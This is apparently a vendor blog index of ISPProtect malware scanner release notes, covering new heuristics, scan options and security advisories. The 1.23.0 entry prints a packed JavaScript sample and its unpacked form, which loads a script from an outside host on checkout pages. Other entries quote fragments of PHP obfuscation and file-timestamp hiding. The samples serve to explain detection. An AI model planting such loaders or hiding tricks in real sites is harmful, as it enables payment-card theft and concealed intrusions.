Today we have released the beta version 1.30.0 of the ISPProtect Malware Scanner. To update your ISPProtect instance to the beta version, use ispp_scan --update --channel=beta. Be aware that this beta version might still contain bugs. Deep scan Some attackers
New version with extended database scan
With today’s version 1.29.0 of ISPProtect we have made some improvements to the code. The database scan has also been enhanced. In the standard mode using the parameter --db-scan only a small subset of the malware heuristics will be applied
New version scans for files in .well-known directories
As the Zscaler team recently reported, there are frequent malware, phishing and virus finds in the .well-known directories on web servers. These directories are used, for example, to confirm domain ownership when a certificate is issued. The widely used “Let’s
New feature: wildcards in scan path
Today the new version 1.26.1 was released. From now on it is possible to use wildcards for the scan. For this there are the new parameters --include and --include-from, with which it is possible to narrow down the paths and
New scanner version (V1.26.0) reduces disk I/O
Today the new version 1.26.0 of the ISPProtect malware scanner was released. In this release there are some new features that make our scanner even better. Speed and disk I/O We’ve re-implemented the file search from scratch. This has enabled
Checking the WordPress settings after cleaning up a hacked or infected website
A few days ago I was hired to clean up a hacked WordPress page that was affected by the security issue in the WP GDPR Compliance plugin. The attacker created a new admin user and changed/uploaded some files to WordPress. For that
New major release of ISPProtect Malware Scanner
Today we are proud to announce our next major release 1.25.0. What has changed? We introduced a new scan level 1.1 to the scan that searches for PHP code hidden inside of image file names. It is a widespread tactic
New version 1.24.13 with new malware heuristics
Today we released the new version 1.24.13 of ISPProtect malware scanner. It includes some new malware signatures and new heuristics for dynamic malware code of which we want to show you a new type of malware that is hard to
Severe remote execution security issue in Drupal announced
On March 28th, Drupal announced a severe security issue in Drupal 7 and 8: https://www.drupal.org/sa-core-2018-002. The issue allows unprivileged users to execute code on the server and disclose all data normally not accessible through the web. The security issue is
New version 1.24.7 released
Today we released version 1.24.7 of ISPProtect. The new version contains new heuristics to recognize further malicious code. Below we take a closer look at a malicious code snippet. $a = base64_decode($b); for($i = 0; $i < strlen($a); $i++){ $a[$i]
New release 1.24.6 with redirect checks
The new release 1.24.6 of ISPProtect contains several improvements to malware heuristics and false positive lists. For example, we added some checks for malicious redirects to foreign pages. Marius Burkard has been working as a software developer for 20
New malware heuristics added
Today we released a new version of ISPProtect that contains improved malware heuristics. It focuses on malware that tries to hide itself or the files it created by setting file modification times to some point in the past. E.g.: <?php touch('/path/to/file', time()
Added option to prevent Ioncube loading
With our new version we added a --no-ioncube switch. This is especially useful if you have installed a system-wide Ioncube loader that conflicts with the one loaded by ISPProtect.
Version 1.24.0 with PHP 7.1 support
Today we released version 1.24.0 of our malware scanner ISPProtect. It adds support for PHP 7.1 and improves the starter script.
New release 1.23.1 with improved database scan options
The new release 1.23.1 of ISPProtect malware scanner adds some useful options to the database scan. --db-no-context hides the context output on hits that were found in databases. --db-exclude=<dbname> excludes database(s) with name <dbname> from the scanning process. You can use
ISPProtect malware scanner 1.23.0 released – unpacking JavaScript
Today we released version 1.23.0 of our malware scanning tool. With this release we added a feature to “unpack” some JavaScripts that were minified. For example:
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.4=5(){6((2 7(\'8|9|a\')).b(1.c)){$$(\'d\')[0].e(2 f(\'g\',{h:\'i/j\',k:\'l://m.n.o/p/3/q/r.3\'}))}}',28,28,'|window|new|js|onload|function|if|RegExp|onepage|checkout|onestep|test|location|head|appendChild|Element|script|type|text|javascript|src|https|boutique|postedecoute|ca|media|shipping|ups'.split('|'),0,{}));
will be unpacked to
window.onload=function(){if((new RegExp('onepage|checkout|onestep')).test(window.location)){$$('head')[0].appendChild(new Element('script',{type:'text/javascript',src:'https://boutique.postedecoute.ca/media/js/shipping/ups.js'}))}}
New ISPProtect version 1.22.0 released
With the new version 1.22.0 of our malware scanner we introduced some additional features. Custom PHP version Sometimes you need to have several PHP versions installed on your server. Now you can decide which one of them is used by
New version 1.21.1 – and malware analysis
Today we released version 1.21.1 of our malware scanner ISPProtect. It adds further improvements and new signatures for an even better malware recognition. With this blog post we want to show you a crypted, let’s say creative, type of malware.
Version 1.21.0 released including SMTP support
We just released our brand new version 1.21.0 of the ISPProtect malware scanner. It includes some new heuristics and updated signatures, but the main improvement is the possibility of sending mails through SMTP instead of the internal PHP mail() function.
Deploy ISPProtect with Puppet
A Puppet Module for ISPProtect is available at Puppet Forge now. Puppet is a tool to automate the deployment and operation of software in large environments. The ISPProtect Puppet module, developed by Eelco Maljaars, can be found at Puppet Forge: